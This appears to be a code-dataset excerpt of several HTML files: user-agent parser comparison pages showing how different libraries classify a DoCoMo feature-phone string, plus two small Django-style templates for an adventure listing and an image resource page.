[ajax_preferred_geoloc_api] => w3c_api [xhtml_support_level] => 4 [preferred_markup] => html_web_4_0 [wml_1_1] => false [wml_1_2] => false [wml_1_3] => false [html_wi_w3_xhtmlbasic] => true [html_wi_oma_xhtmlmp_1_0] => true [html_wi_imode_html_1] => false [html_wi_imode_html_2] => false [html_wi_imode_html_3] => false [html_wi_imode_html_4] => false [html_wi_imode_html_5] => false [html_wi_imode_htmlx_1] => false [html_wi_imode_htmlx_1_1] => false [html_wi_imode_compact_generic] => false [html_web_3_2] => true [html_web_4_0] => true [voicexml] => false [multipart_support] => false [total_cache_disable_support] => false [time_to_live_support] => false [resolution_width] => 480 [resolution_height] => 800 [columns] => 60 [max_image_width] => 320 [max_image_height] => 400 [rows] => 40 [physical_screen_width] => 50 [physical_screen_height] => 83 [dual_orientation] => true [density_class] => 1.0 [wbmp] => true [bmp] => false [epoc_bmp] => false [gif_animated] => false [jpg] => true [png] => true [tiff] => false [transparent_png_alpha] => true [transparent_png_index] => true [svgt_1_1] => false [svgt_1_1_plus] => false [greyscale] => false [gif] => true [colors] => 65536 [webp_lossy_support] => false [webp_lossless_support] => false [post_method_support] => true [basic_authentication_support] => true [empty_option_value_support] => true [emptyok] => false [nokia_voice_call] => false [wta_voice_call] => false [wta_phonebook] => false [wta_misc] => false [wta_pdc] => false [https_support] => true [phone_id_provided] => false [max_data_rate] => 384 [wifi] => true [sdio] => false [vpn] => false [has_cellular_radio] => true [max_deck_size] => 2000000 [max_url_length_in_requests] => 256 [max_url_length_homepage] => 0 [max_url_length_bookmark] => 0 [max_url_length_cached_page] => 0 [max_no_of_connection_settings] => 0 [max_no_of_bookmarks] => 0 [max_length_of_username] => 0 [max_length_of_password] => 0 [max_object_size] => 0 [downloadfun_support] => false [directdownload_support] => true [inline_support] => false [oma_support] => true [ringtone] => false [ringtone_3gpp] => false [ringtone_midi_monophonic] => false [ringtone_midi_polyphonic] => false [ringtone_imelody] => false [ringtone_digiplug] => false [ringtone_compactmidi] => false [ringtone_mmf] => false [ringtone_rmf] => false [ringtone_xmf] => false [ringtone_amr] => false [ringtone_awb] => false [ringtone_aac] => false [ringtone_wav] => false [ringtone_mp3] => false [ringtone_spmidi] => false [ringtone_qcelp] => false [ringtone_voices] => 1 [ringtone_df_size_limit] => 0 [ringtone_directdownload_size_limit] => 0 [ringtone_inline_size_limit] => 0 [ringtone_oma_size_limit] => 0 [wallpaper] => false [wallpaper_max_width] => 0 [wallpaper_max_height] => 0 [wallpaper_preferred_width] => 0 [wallpaper_preferred_height] => 0 [wallpaper_resize] => none [wallpaper_wbmp] => false [wallpaper_bmp] => false [wallpaper_gif] => false [wallpaper_jpg] => false [wallpaper_png] => false [wallpaper_tiff] => false [wallpaper_greyscale] => false [wallpaper_colors] => 2 [wallpaper_df_size_limit] => 0 [wallpaper_directdownload_size_limit] => 0 [wallpaper_inline_size_limit] => 0 [wallpaper_oma_size_limit] => 0 [screensaver] => false [screensaver_max_width] => 0 [screensaver_max_height] => 0 [screensaver_preferred_width] => 0 [screensaver_preferred_height] => 0 [screensaver_resize] => none [screensaver_wbmp] => false [screensaver_bmp] => false [screensaver_gif] => false [screensaver_jpg] => false [screensaver_png] => false [screensaver_greyscale] => false [screensaver_colors] => 2 [screensaver_df_size_limit] => 0 [screensaver_directdownload_size_limit] => 0 [screensaver_inline_size_limit] => 0 [screensaver_oma_size_limit] => 0 [picture] => false [picture_max_width] => 0 [picture_max_height] => 0 [picture_preferred_width] => 0 [picture_preferred_height] => 0 [picture_resize] => none [picture_wbmp] => false [picture_bmp] => false [picture_gif] => false [picture_jpg] => false [picture_png] => false [picture_greyscale] => false [picture_colors] => 2 [picture_df_size_limit] => 0 [picture_directdownload_size_limit] => 0 [picture_inline_size_limit] => 0 [picture_oma_size_limit] => 0 [video] => false [oma_v_1_0_forwardlock] => false [oma_v_1_0_combined_delivery] => false [oma_v_1_0_separate_delivery] => false [streaming_video] => true [streaming_3gpp] => true [streaming_mp4] => true [streaming_mov] => false [streaming_video_size_limit] => 0 [streaming_real_media] => none [streaming_flv] => false [streaming_3g2] => false [streaming_vcodec_h263_0] => 10 [streaming_vcodec_h263_3] => -1 [streaming_vcodec_mpeg4_sp] => 2 [streaming_vcodec_mpeg4_asp] => -1 [streaming_vcodec_h264_bp] => 3.0 [streaming_acodec_amr] => nb [streaming_acodec_aac] => lc [streaming_wmv] => none [streaming_preferred_protocol] => rtsp [streaming_preferred_http_protocol] => progressive_download [wap_push_support] => false [connectionless_service_indication] => false [connectionless_service_load] => false [connectionless_cache_operation] => false [connectionoriented_unconfirmed_service_indication] => false [connectionoriented_unconfirmed_service_load] => false [connectionoriented_unconfirmed_cache_operation] => false [connectionoriented_confirmed_service_indication] => false [connectionoriented_confirmed_service_load] => false [connectionoriented_confirmed_cache_operation] => false [utf8_support] => true [ascii_support] => false [iso8859_support] => false [expiration_date] => false [j2me_cldc_1_0] => false [j2me_cldc_1_1] => false [j2me_midp_1_0] => false [j2me_midp_2_0] => false [doja_1_0] => false [doja_1_5] => false [doja_2_0] => false [doja_2_1] => false [doja_2_2] => false [doja_3_0] => false [doja_3_5] => false [doja_4_0] => false [j2me_jtwi] => false [j2me_mmapi_1_0] => false [j2me_mmapi_1_1] => false [j2me_wmapi_1_0] => false [j2me_wmapi_1_1] => false [j2me_wmapi_2_0] => false [j2me_btapi] => false [j2me_3dapi] => false [j2me_locapi] => false [j2me_nokia_ui] => false [j2me_motorola_lwt] => false [j2me_siemens_color_game] => false [j2me_siemens_extension] => false [j2me_heap_size] => 0 [j2me_max_jar_size] => 0 [j2me_storage_size] => 0 [j2me_max_record_store_size] => 0 [j2me_screen_width] => 0 [j2me_screen_height] => 0 [j2me_canvas_width] => 0 [j2me_canvas_height] => 0 [j2me_bits_per_pixel] => 0 [j2me_audio_capture_enabled] => false [j2me_video_capture_enabled] => false [j2me_photo_capture_enabled] => false [j2me_capture_image_formats] => none [j2me_http] => false [j2me_https] => false [j2me_socket] => false [j2me_udp] => false [j2me_serial] => false [j2me_gif] => false [j2me_gif89a] => false [j2me_jpg] => false [j2me_png] => false [j2me_bmp] => false [j2me_bmp3] => false [j2me_wbmp] => false [j2me_midi] => false [j2me_wav] => false [j2me_amr] => false [j2me_mp3] => false [j2me_mp4] => false [j2me_imelody] => false [j2me_rmf] => false [j2me_au] => false [j2me_aac] => false [j2me_realaudio] => false [j2me_xmf] => false [j2me_wma] => false [j2me_3gpp] => false [j2me_h263] => false [j2me_svgt] => false [j2me_mpeg4] => false [j2me_realvideo] => false [j2me_real8] => false [j2me_realmedia] => false [j2me_left_softkey_code] => 0 [j2me_right_softkey_code] => 0 [j2me_middle_softkey_code] => 0 [j2me_select_key_code] => 0 [j2me_return_key_code] => 0 [j2me_clear_key_code] => 0 [j2me_datefield_no_accepts_null_date] => false [j2me_datefield_broken] => false [receiver] => false [sender] => false [mms_max_size] => 0 [mms_max_height] => 0 [mms_max_width] => 0 [built_in_recorder] => false [built_in_camera] => true [mms_jpeg_baseline] => false [mms_jpeg_progressive] => false [mms_gif_static] => false [mms_gif_animated] => false [mms_png] => false [mms_bmp] => false [mms_wbmp] => false [mms_amr] => false [mms_wav] => false [mms_midi_monophonic] => false [mms_midi_polyphonic] => false [mms_midi_polyphonic_voices] => 0 [mms_spmidi] => false [mms_mmf] => false [mms_mp3] => false [mms_evrc] => false [mms_qcelp] => false [mms_ota_bitmap] => false [mms_nokia_wallpaper] => false [mms_nokia_operatorlogo] => false [mms_nokia_3dscreensaver] => false [mms_nokia_ringingtone] => false [mms_rmf] => false [mms_xmf] => false [mms_symbian_install] => false [mms_jar] => false [mms_jad] => false [mms_vcard] => false [mms_vcalendar] => false [mms_wml] => false [mms_wbxml] => false [mms_wmlc] => false [mms_video] => false [mms_mp4] => false [mms_3gpp] => false [mms_3gpp2] => false [mms_max_frame_rate] => 0 [nokiaring] => false [picturemessage] => false [operatorlogo] => false [largeoperatorlogo] => false [callericon] => false [nokiavcard] => false [nokiavcal] => false [sckl_ringtone] => false [sckl_operatorlogo] => false [sckl_groupgraphic] => false [sckl_vcard] => false [sckl_vcalendar] => false [text_imelody] => false [ems] => false [ems_variablesizedpictures] => false [ems_imelody] => false [ems_odi] => false [ems_upi] => false [ems_version] => 0 [siemens_ota] => false [siemens_logo_width] => 101 [siemens_logo_height] => 29 [siemens_screensaver_width] => 101 [siemens_screensaver_height] => 50 [gprtf] => false [sagem_v1] => false [sagem_v2] => false [panasonic] => false [sms_enabled] => true [wav] => false [mmf] => false [smf] => false [mld] => false [midi_monophonic] => false [midi_polyphonic] => false [sp_midi] => false [rmf] => false [xmf] => false [compactmidi] => false [digiplug] => false [nokia_ringtone] => false [imelody] => false [au] => false [amr] => false [awb] => false [aac] => true [mp3] => true [voices] => 1 [qcelp] => false [evrc] => false [flash_lite_version] => [fl_wallpaper] => false [fl_screensaver] => false [fl_standalone] => false [fl_browser] => false [fl_sub_lcd] => false [full_flash_support] => true [css_supports_width_as_percentage] => true [css_border_image] => webkit [css_rounded_corners] => webkit [css_gradient] => none [css_spriting] => true [css_gradient_linear] => none [is_transcoder] => false [transcoder_ua_header] => user-agent [rss_support] => false [pdf_support] => true [progressive_download] => true [playback_vcodec_h263_0] => 10 [playback_vcodec_h263_3] => -1 [playback_vcodec_mpeg4_sp] => 0 [playback_vcodec_mpeg4_asp] => -1 [playback_vcodec_h264_bp] => 3.0 [playback_real_media] => none [playback_3gpp] => true [playback_3g2] => false [playback_mp4] => true [playback_mov] => false [playback_acodec_amr] => nb [playback_acodec_aac] => none [playback_df_size_limit] => 0 [playback_directdownload_size_limit] => 0 [playback_inline_size_limit] => 0 [playback_oma_size_limit] => 0 [playback_acodec_qcelp] => false [playback_wmv] => none [hinted_progressive_download] => true [html_preferred_dtd] => html4 [viewport_supported] => true [viewport_width] => device_width_token [viewport_userscalable] => no [viewport_initial_scale] => [viewport_maximum_scale] => [viewport_minimum_scale] => [mobileoptimized] => false [handheldfriendly] => false [canvas_support] => full [image_inlining] => true [is_smarttv] => false [is_console] => false [nfc_support] => false [ux_full_desktop] => false [jqm_grade] => A [is_sencha_touch_ok] => false [controlcap_is_smartphone] => default [controlcap_is_ios] => default [controlcap_is_android] => default [controlcap_is_robot] => default [controlcap_is_app] => default [controlcap_advertised_device_os] => default [controlcap_advertised_device_os_version] => default [controlcap_advertised_browser] => default [controlcap_advertised_browser_version] => default [controlcap_is_windows_phone] => default [controlcap_is_full_desktop] => default [controlcap_is_largescreen] => default [controlcap_is_mobile] => default [controlcap_is_touchscreen] => default [controlcap_is_wml_preferred] => default [controlcap_is_xhtmlmp_preferred] => default [controlcap_is_html_preferred] => default [controlcap_form_factor] => default [controlcap_complete_device_name] => default ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr></table> </div> <div class="section"> <h1 class="header center orange-text">About this comparison</h1> <div class="row center"> <h5 class="header light"> The primary goal of this project is simple<br /> I wanted to know which user agent parser is the most accurate in each part - device detection, bot detection and so on...<br /> <br /> The secondary goal is to provide a source for all user agent parsers to improve their detection based on this results.<br /> <br /> You can also improve this further, by suggesting ideas at <a href="https://github.com/ThaDafinser/UserAgentParserComparison">ThaDafinser/UserAgentParserComparison</a><br /> <br /> The comparison is based on the abstraction by <a href="https://github.com/ThaDafinser/UserAgentParser">ThaDafinser/UserAgentParser</a> </h5> </div> </div> <div class="card"> <div class="card-content"> Comparison created <i>2016-02-13 13:37:33</i> | by <a href="https://github.com/ThaDafinser">ThaDafinser</a> </div> </div> </div> <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/js/materialize.min.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/list.js/1.1.1/list.min.js"></script> <script> $(document).ready(function(){ // the "href" attribute of .modal-trigger must specify the modal ID that wants to be triggered $('.modal-trigger').leanModal(); }); </script> </body> </html>
ThaDafinser/UserAgentParserComparison
v4/user-agent-detail/ad/03/ad03a2d6-a5c9-45b1-9a63-5381ec942da9.html
HTML
mit
46,539
{% extends "adventure/views/templates/layout.html" %} {% block content %} <div class="post"> <div class="post_inner"> <div class="the_post format-text"> <ul> {% for adventure in adventures %} <li> <a href="/adventure/{{ adventure.id }}">{{ adventure.title }}</a> <div class="additional-meta-wrap"> <div class="additional-meta"> <div class="meta-date"> Created by {{ adventure.author }} on {{ adventure.created_on|date:"MM/dd/yyyy" }} </div> </div> </div> <br /> </li> {% endfor %} </ul> </div> </div> </div> {% endblock %} {% block extra-js %} {% if analytics-id %} (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create','{{ analytics-id }}','inchingforward.com'); ga('send', 'pageview'); {% endif %} {% endblock %}
inchingforward/adventure
src/adventure/views/templates/home.html
HTML
mit
1,133
{% extends "images/base.html" %} {% block content %} <h2>{{ resource }}</h2> <p><strong>Tags: </strong> {% for tag in resource.tags.all %} <a href={% url 'tag' tag %}>{{ tag }}</a> {% endfor %} <p><strong>Similar Images: </strong> {% for resource in resource.tags.similar_objects %} <a href="{% url 'resource' resource.id %}">{{ resource }}</a> {% endfor %}</p> <img src="{{ resource.file.url }}" class="thumbnail"> {% endblock %}
bdunnette/pima
images/templates/images/resource.html
HTML
mit
435
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>User agent detail - DoCoMo/2.0 P90liS(c100;TB;W20H10)</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.3/css/materialize.min.css"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> <link href="../circle.css" rel="stylesheet"> </head> <body> <div class="container"> <div class="section"> <h1 class="header center orange-text">User agent detail</h1> <div class="row center"> <h5 class="header light"> DoCoMo/2.0 P90liS(c100;TB;W20H10) </h5> </div> </div> <div class="section"> <table class="striped"><tr><th></th><th colspan="3">General</th><th colspan="5">Device</th><th colspan="3">Bot</th><th colspan="2"></th></tr><tr><th>Provider</th><th>Browser</th><th>Engine</th><th>OS</th><th>Brand</th><th>Model</th><th>Type</th><th>Is mobile</th><th>Is touch</th><th>Is bot</th><th>Name</th><th>Type</th><th>Parse time</th><th>Actions</th></tr><tr><th colspan="14" class="green lighten-3">Test suite</th></tr><tr><td>UAParser<br /><small>v0.5.0.2</small><br /><small>vendor/thadafinser/uap-core/tests/test_device.yaml</small></td><td> </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555">DoCoMo</td><td>P90liS</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-cfed3005-df48-4fa8-bf03-4f6ef8988f59">Detail</a> <!-- Modal Structure --> <div id="modal-cfed3005-df48-4fa8-bf03-4f6ef8988f59" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UAParser result detail</h4> <p><pre><code class="php">Array ( [user_agent_string] => DoCoMo/2.0 P90liS(c100;TB;W20H10) [family] => DoCoMo P90liS [brand] => DoCoMo [model] => P90liS ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><th colspan="14" class="green lighten-3">Providers</th></tr><tr><td>BrowscapFull<br /><small>6014</small><br /></td><td>DoCoMo 2.0</td><td> </td><td>JAVA </td><td style="border-left: 1px solid #555"></td><td></td><td>Mobile Device</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.007</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-47a9cd06-e213-4882-bc34-db6aed664223">Detail</a> <!-- Modal Structure --> <div id="modal-47a9cd06-e213-4882-bc34-db6aed664223" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>BrowscapFull result detail</h4> <p><pre><code class="php">stdClass Object ( [browser_name_regex] => /^docomo\/2\.0.*$/ [browser_name_pattern] => docomo/2.0* [parent] => DoCoMo [comment] => DoCoMo [browser] => DoCoMo [browser_type] => Browser [browser_bits] => 32 [browser_maker] => unknown [browser_modus] => unknown [version] => 2.0 [majorver] => 2 [minorver] => 0 [platform] => JAVA [platform_version] => unknown [platform_description] => unknown [platform_bits] => 32 [platform_maker] => Oracle [alpha] => [beta] => [win16] => [win32] => [win64] => [frames] => 1 [iframes] => 1 [tables] => 1 [cookies] => 1 [backgroundsounds] => [javascript] => 1 [vbscript] => [javaapplets] => [activexcontrols] => [ismobiledevice] => 1 [istablet] => [issyndicationreader] => [crawler] => [isfake] => [isanonymized] => [ismodified] => [cssversion] => 1 [aolversion] => 0 [device_name] => general Mobile Device [device_maker] => unknown [device_type] => Mobile Device [device_pointing_method] => unknown [device_code_name] => general Mobile Device [device_brand_name] => unknown [renderingengine_name] => unknown [renderingengine_version] => unknown [renderingengine_description] => unknown [renderingengine_maker] => unknown ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>BrowscapLite<br /><small>6014</small><br /></td> <td colspan="12" class="center-align red lighten-1"> <strong>No result found</strong> </td> </tr><tr><td>BrowscapPhp<br /><small>6014</small><br /></td><td>DoCoMo 2.0</td><td><i class="material-icons">close</i></td><td>JAVA </td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>Mobile Device</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.01</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-ad0041a2-b0f4-43f6-a70d-cad1443caa68">Detail</a> <!-- Modal Structure --> <div id="modal-ad0041a2-b0f4-43f6-a70d-cad1443caa68" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>BrowscapPhp result detail</h4> <p><pre><code class="php">stdClass Object ( [browser_name_regex] => /^docomo\/2\.0.*$/ [browser_name_pattern] => docomo/2.0* [parent] => DoCoMo [comment] => DoCoMo [browser] => DoCoMo [browser_type] => unknown [browser_bits] => 0 [browser_maker] => unknown [browser_modus] => unknown [version] => 2.0 [majorver] => 2 [minorver] => 0 [platform] => JAVA [platform_version] => unknown [platform_description] => unknown [platform_bits] => 0 [platform_maker] => unknown [alpha] => false [beta] => false [win16] => false [win32] => false [win64] => false [frames] => false [iframes] => false [tables] => false [cookies] => false [backgroundsounds] => false [javascript] => false [vbscript] => false [javaapplets] => false [activexcontrols] => false [ismobiledevice] => 1 [istablet] => [issyndicationreader] => false [crawler] => [isfake] => false [isanonymized] => false [ismodified] => false [cssversion] => 0 [aolversion] => 0 [device_name] => unknown [device_maker] => unknown [device_type] => Mobile Device [device_pointing_method] => unknown [device_code_name] => unknown [device_brand_name] => unknown [renderingengine_name] => unknown [renderingengine_version] => unknown [renderingengine_description] => unknown [renderingengine_maker] => unknown ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>DonatjUAParser<br /><small>v0.5.1</small><br /></td><td>DoCoMo 2.0</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-15fbc1f0-2615-4d42-b5d9-a30dd647b050">Detail</a> <!-- Modal Structure --> <div id="modal-15fbc1f0-2615-4d42-b5d9-a30dd647b050" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>DonatjUAParser result detail</h4> <p><pre><code class="php">Array ( [platform] => [browser] => DoCoMo [version] => 2.0 ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>JenssegersAgent<br /><small>v2.3.3</small><br /></td> <td colspan="12" class="center-align red lighten-1"> <strong>No result found</strong> </td> </tr><tr><td>NeutrinoApiCom<br /><small></small><br /></td><td>NetFront </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555">DoCoMo</td><td></td><td>mobile-browser</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.20801</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-8c2a7a4e-3fbf-4df2-8d61-5e730422f67b">Detail</a> <!-- Modal Structure --> <div id="modal-8c2a7a4e-3fbf-4df2-8d61-5e730422f67b" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>NeutrinoApiCom result detail</h4> <p><pre><code class="php">stdClass Object ( [mobile_screen_height] => 320 [is_mobile] => 1 [type] => mobile-browser [mobile_brand] => DoCoMo [mobile_model] => [version] => [is_android] => [browser_name] => NetFront [operating_system_family] => unknown [operating_system_version] => [is_ios] => [producer] => ACCESS CO.,LTD [operating_system] => unknown [mobile_screen_width] => 240 [mobile_browser] => ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>PiwikDeviceDetector<br /><small>3.6.1</small><br /></td><td> </td><td> </td><td> </td><td style="border-left: 1px solid #555">DoCoMo</td><td>P90liS</td><td>feature phone</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td></td><td></td><td>0.007</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-4a941d34-a8d3-4914-9724-346f60ad7046">Detail</a> <!-- Modal Structure --> <div id="modal-4a941d34-a8d3-4914-9724-346f60ad7046" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>PiwikDeviceDetector result detail</h4> <p><pre><code class="php">Array ( [client] => [operatingSystem] => Array ( ) [device] => Array ( [brand] => DC [brandName] => DoCoMo [model] => P90liS [device] => 3 [deviceName] => feature phone ) [bot] => [extra] => Array ( [isBot] => [isBrowser] => [isFeedReader] => [isMobileApp] => [isPIM] => [isLibrary] => [isMediaPlayer] => [isCamera] => [isCarBrowser] => [isConsole] => [isFeaturePhone] => 1 [isPhablet] => [isPortableMediaPlayer] => [isSmartDisplay] => [isSmartphone] => [isTablet] => [isTV] => [isDesktop] => [isMobile] => 1 [isTouchEnabled] => ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>SinergiBrowserDetector<br /><small>6.0.1</small><br /></td> <td colspan="12" class="center-align red lighten-1"> <strong>No result found</strong> </td> </tr><tr><td>UAParser<br /><small>v3.4.5</small><br /></td><td> </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555">DoCoMo</td><td>P90liS</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.002</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-3160e405-8a8f-46dd-8f47-5115f06462d2">Detail</a> <!-- Modal Structure --> <div id="modal-3160e405-8a8f-46dd-8f47-5115f06462d2" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UAParser result detail</h4> <p><pre><code class="php">UAParser\Result\Client Object ( [ua] => UAParser\Result\UserAgent Object ( [major] => [minor] => [patch] => [family] => Other ) [os] => UAParser\Result\OperatingSystem Object ( [major] => [minor] => [patch] => [patchMinor] => [family] => Other ) [device] => UAParser\Result\Device Object ( [brand] => DoCoMo [model] => P90liS [family] => DoCoMo P90liS ) [originalUserAgent] => DoCoMo/2.0 P90liS(c100;TB;W20H10) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UserAgentApiCom<br /><small></small><br /></td><td> </td><td> </td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>Mobile</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.15301</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-afeb05fb-26b9-4509-b8ac-0c604a9e97d6">Detail</a> <!-- Modal Structure --> <div id="modal-afeb05fb-26b9-4509-b8ac-0c604a9e97d6" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>UserAgentApiCom result detail</h4> <p><pre><code class="php">stdClass Object ( [platform_name] => NTT DoCoMo [platform_version] => 2.0 [platform_type] => Mobile ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>UserAgentStringCom<br /><small></small><br /></td> <td colspan="12" class="center-align red lighten-1"> <strong>No result found</strong> </td> </tr><tr><td>WhatIsMyBrowserCom<br /><small></small><br /></td><td> </td><td> </td><td> </td><td style="border-left: 1px solid #555"></td><td>P90liS</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.23401</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-5fc1ff22-a74d-481b-9ad1-fcfde73ded9c">Detail</a> <!-- Modal Structure --> <div id="modal-5fc1ff22-a74d-481b-9ad1-fcfde73ded9c" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhatIsMyBrowserCom result detail</h4> <p><pre><code class="php">stdClass Object ( [operating_system_name] => [simple_sub_description_string] => [simple_browser_string] => [browser_version] => [extra_info] => Array ( ) [operating_platform] => P90liS [extra_info_table] => Array ( ) [layout_engine_name] => [detected_addons] => Array ( ) [operating_system_flavour_code] => [hardware_architecture] => [operating_system_flavour] => [operating_system_frameworks] => Array ( ) [browser_name_code] => [operating_system_version] => [simple_operating_platform_string] => P90liS [is_abusive] => [layout_engine_version] => [browser_capabilities] => Array ( ) [operating_platform_vendor_name] => [operating_system] => [operating_system_version_full] => [operating_platform_code] => [browser_name] => [operating_system_name_code] => [user_agent] => DoCoMo/2.0 P90liS(c100;TB;W20H10) [browser_version_full] => [browser] => ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>WhichBrowser<br /><small>v2.0.18</small><br /></td><td> </td><td> </td><td> </td><td style="border-left: 1px solid #555"></td><td>P90liS</td><td>mobile:feature</td><td>yes</td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0.001</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-083a336f-5d73-4505-84f3-c5fc9bb78652">Detail</a> <!-- Modal Structure --> <div id="modal-083a336f-5d73-4505-84f3-c5fc9bb78652" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>WhichBrowser result detail</h4> <p><pre><code class="php">Array ( [device] => Array ( [type] => mobile [subtype] => feature [model] => P90liS [carrier] => DoCoMo ) ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Woothee<br /><small>v1.2.0</small><br /></td><td>docomo P90liS</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>mobilephone</td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td style="border-left: 1px solid #555"></td><td></td><td><i class="material-icons">close</i></td><td>0</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-f00e7198-0e22-49fe-bad0-dbb3a9cde9b9">Detail</a> <!-- Modal Structure --> <div id="modal-f00e7198-0e22-49fe-bad0-dbb3a9cde9b9" class="modal modal-fixed-footer"> <div class="modal-content"> <h4>Woothee result detail</h4> <p><pre><code class="php">Array ( [name] => docomo [os] => docomo [category] => mobilephone [vendor] => docomo [version] => P90liS [os_version] => UNKNOWN ) </code></pre></p> </div> <div class="modal-footer"> <a href="#!" class="modal-action modal-close waves-effect waves-green btn-flat ">close</a> </div> </div> </td></tr><tr><td>Wurfl<br /><small>1.7.1.0</small><br /></td><td> </td><td><i class="material-icons">close</i></td><td> </td><td style="border-left: 1px solid #555">DoCoMo</td><td></td><td>Feature Phone</td><td>yes</td><td></td><td style="border-left: 1px solid #555"></td><td><i class="material-icons">close</i></td><td><i class="material-icons">close</i></td><td>0.016</td><td> <!-- Modal Trigger --> <a class="modal-trigger btn waves-effect waves-light" href="#modal-a2bedf8c-4a95-42a7-96c5-aaf233b2ac50">Detail</a> <!-- Modal Structure --> <div id="modal-a2bedf8c-4a95-42a7-96c5-aaf233b2ac50" class="modal 